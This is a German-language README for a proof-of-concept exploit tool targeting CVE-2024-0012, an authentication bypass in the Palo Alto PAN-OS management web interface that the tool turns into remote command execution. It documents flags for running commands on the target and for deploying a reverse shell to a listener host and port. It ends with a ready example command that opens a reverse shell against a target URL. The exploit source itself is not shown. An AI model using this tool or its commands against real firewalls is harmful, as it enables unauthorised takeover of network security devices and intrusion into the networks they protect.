
CVE-2024-0012 PAN-OS: Authentifizierungsumgehung in der Management-Weboberfläche (PAN-SA-2024-0015) RCE POC
CVE-2024-0012, eine Authentifizierungsumgehung in der PAN-OS-Software von Palo Alto Networks, ermöglicht es einem nicht authentifizierten Angreifer mit Netzwerkzugriff auf das Management-Web-Interface, PAN-OS-Administratorrechte zu erlangen, administrative Aktionen durchzuführen, die Konfiguration zu manipulieren oder andere authentifizierte Privilegieneskalations-Schwachstellen auszunutzen.

| ❗ Disclaimer |
|---|
| Dieses Projekt ist in erster Linie als eigenständiges CLI-Tool konzipiert. Das Ausführen dieses Exploits als Dienst kann Sicherheitsrisiken darstellen. Es wird empfohlen, es mit Vorsicht und zusätzlichen Sicherheitsmaßnahmen zu verwenden. DWYOR |
python3 cve-2024-0012.py -h
Dies zeigt die Hilfe für das Tool an. Hier sind alle unterstützten Optionen.
Usage:
python3 cve-2024-0012.py [flags]
Flags:
-h, --help show this help message and exit
--url URL Target base URL (http:// or https://)
--no-verify Disable SSL verification
--timeout TIMEOUT Request timeout in seconds
--command COMMAND Command to execute on the target
--reverse-shell Deploy a reverse shell to the target
--lhost LHOST Local host for reverse shell connection (required for reverse shell)
--lport LPORT Local port for reverse shell connection (required for reverse shell)
Reverse-Shell-Befehl.
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444